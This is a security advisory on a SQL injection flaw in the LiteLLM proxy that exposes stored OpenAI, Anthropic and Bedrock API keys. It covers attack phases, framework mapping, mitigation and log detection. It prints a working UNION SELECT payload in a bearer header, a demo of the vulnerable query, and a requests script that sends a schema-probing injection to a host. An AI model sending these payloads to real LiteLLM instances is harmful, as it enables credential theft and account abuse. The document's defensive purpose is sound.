Overview
A critical unauthenticated SQL injection vulnerability in the popular open-source LLM gateway LiteLLM, tracked as CVE-2026-42208, is under active exploitation. Threat actors are leveraging the flaw to extract sensitive credentials, including API keys for OpenAI, Anthropic, and AWS Bedrock, directly from the proxy’s backend database. Sysdig researchers confirmed exploitation approximately 36 hours after public disclosure on April 24, 2026, underscoring the speed at which AI infrastructure vulnerabilities are now weaponised.
LiteLLM is a widely adopted proxy and SDK layer that provides a unified API interface for calling multiple LLM providers. With 45,000 GitHub stars and 7,600 forks, its compromise represents a significant supply-chain risk across the LLM application ecosystem.
Technical Analysis
The vulnerability exists in LiteLLM’s proxy API key verification logic, where SQL queries were built via string concatenation rather than parameterised queries. An attacker can place a malicious payload in the Authorization: Bearer header and send it to any LLM API route, such as /chat/completions, without prior authentication:
POST /chat/completions HTTP/1.1
Host: <litellm-host>
Authorization: Bearer ' UNION SELECT api_key, key_alias, spend FROM litellm_verificationtoken--
Content-Type: application/json
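
The underlying bug class is easy to demonstrate in isolation. The Python sketch below is illustrative only: the table, column names, and lookup helper are hypothetical stand-ins (an in-memory SQLite table rather than LiteLLM’s actual data layer), but they show how a bearer value like the one above escapes a concatenated query.

import sqlite3

# Illustrative stand-in for the proxy's key table; not LiteLLM's actual schema.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE litellm_verificationtoken (token TEXT, key_alias TEXT)")
conn.execute("INSERT INTO litellm_verificationtoken VALUES ('sk-prod-secret', 'prod-key')")

def verify_token_vulnerable(token: str):
    # The bug class: the bearer value is interpolated straight into the SQL
    # string, so attacker-supplied quotes change the query's structure.
    query = ("SELECT token, key_alias FROM litellm_verificationtoken "
             f"WHERE token = '{token}'")
    return conn.execute(query).fetchall()

# A bearer value shaped like the observed payload: the leading quote closes
# the string literal and the UNION clause dumps every stored key.
payload = "' UNION SELECT token, key_alias FROM litellm_verificationtoken--"
print(verify_token_vulnerable(payload))  # [('sk-prod-secret', 'prod-key')]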
Sysdig’s analysis of observed exploitation revealed a two-phase attack pattern:
- Reconnaissance phase: Attackers probed the database schema, querying specific tables storing API keys, provider credentials, environment variables, and configuration secrets. Crucially, no benign tables were queried, indicating prior knowledge of LiteLLM’s data model (an illustrative probe of this kind follows this list).
- Precision phase: Attackers rotated IP addresses for evasion, then reissued targeted queries against confirmed table names, reducing noise and improving extraction efficiency.
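
For defenders who want to reproduce the reconnaissance pattern against a staging instance they own, a schema-probing request might look like the sketch below. The host, model name, and the Postgres information_schema target are assumptions, and a real probe’s column count would have to match the injected query.

import requests

BASE = "http://litellm-staging.internal:4000"  # hypothetical test host you control

# Schema-probing payload of the kind described above: rather than dumping a
# known table, it enumerates table names (assumes a Postgres backend).
probe = "' UNION SELECT table_name, NULL, NULL FROM information_schema.tables--"

resp = requests.post(
    f"{BASE}/chat/completions",
    headers={"Authorization": f"Bearer {probe}",
             "Content-Type": "application/json"},
    json={"model": "gpt-4", "messages": [{"role": "user", "content": "hi"}]},
    timeout=10,
)
print(resp.status_code, resp.text[:200])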
A fix was delivered in LiteLLM v1.83.7 by replacing string concatenation with parameterised queries throughout the affected verification flow.
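
The remediation pattern is conventional: bind the token as a query parameter so the driver treats it as data. Continuing the illustrative sketch above (again, not LiteLLM’s actual data layer):

def verify_token_fixed(token: str):
    # The '?' placeholder binds the bearer value as data, so quotes and
    # UNION clauses inside it can no longer alter the query's structure.
    query = "SELECT token, key_alias FROM litellm_verificationtoken WHERE token = ?"
    return conn.execute(query, (token,)).fetchall()

print(verify_token_fixed(payload))  # [] -- the injection string matches no token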
Framework Mapping
- AML.T0040 (ML Model Inference API Access): Stolen provider credentials grant direct, unauthenticated access to underlying LLM inference APIs.
- AML.T0012 (Valid Accounts): Harvested API keys and master keys allow attackers to impersonate legitimate users against AI providers.
- AML.T0057 (LLM Data Leakage): Sensitive configuration data and secrets are directly exfiltrated from the proxy database.
- LLM06 (Sensitive Information Disclosure): The vulnerability directly exposes stored secrets, provider tokens, and environment configurations.
- LLM05 (Supply Chain Vulnerabilities): LiteLLM’s position as a middleware layer means compromise cascades across all connected AI services.
Impact Assessment
Organisations running unpatched, self-hosted LiteLLM instances face immediate credential exposure. Stolen API keys can be used to:
- Exhaust billing quotas on provider accounts (OpenAI, Anthropic, AWS Bedrock)
- Access proprietary prompts and pipeline configurations
- Pivot into connected infrastructure using environment secrets
The attack surface is broad: LiteLLM is embedded in numerous LLM application stacks, MLOps platforms, and enterprise AI gateways. A concurrent supply-chain campaign delivering malicious PyPI packages compounds overall risk for the LiteLLM ecosystem.
Mitigation & Recommendations
- Upgrade immediately to LiteLLM v1.83.7 or later — this is the only complete remediation.
- Rotate all credentials stored in the LiteLLM database: API keys, virtual keys, master keys, and any provider tokens (OpenAI, Anthropic, Bedrock).
- Audit logs for POST requests to /chat/completions or other API routes with anomalous Authorization headers, particularly those containing SQL metacharacters; a log-triage sketch follows this list.
- Restrict network exposure of LiteLLM proxy instances; place them behind authenticated reverse proxies where possible.
- Review PyPI dependencies for LiteLLM-adjacent packages given the concurrent supply-chain campaign.
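
To make the log-audit step concrete, the sketch below flags requests whose bearer token contains SQL metacharacters. The JSON-lines log format and the path and authorization field names are assumptions; adapt the parsing to whatever your gateway or reverse proxy actually emits.

import json
import re
import sys

# Common SQL injection metacharacters and keywords seen in the observed payloads.
SQLI_PATTERN = re.compile(r"['\";]|--|\b(UNION|SELECT|FROM)\b", re.IGNORECASE)

def suspicious_entries(log_path: str):
    # Assumes one JSON object per line with "path" and "authorization" fields;
    # adjust to your actual access-log schema.
    with open(log_path) as fh:
        for line in fh:
            try:
                entry = json.loads(line)
            except json.JSONDecodeError:
                continue
            auth = entry.get("authorization", "")
            if SQLI_PATTERN.search(auth):
                yield entry.get("path", "?"), auth

if __name__ == "__main__":
    for path, auth in suspicious_entries(sys.argv[1]):
        print(f"[!] {path}: {auth}")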
References
- BleepingComputer: Hackers are exploiting a critical LiteLLM pre-auth SQLi flaw
- LiteLLM Security Advisory: CVE-2026-42208
- Sysdig Threat Research Report (April 2026)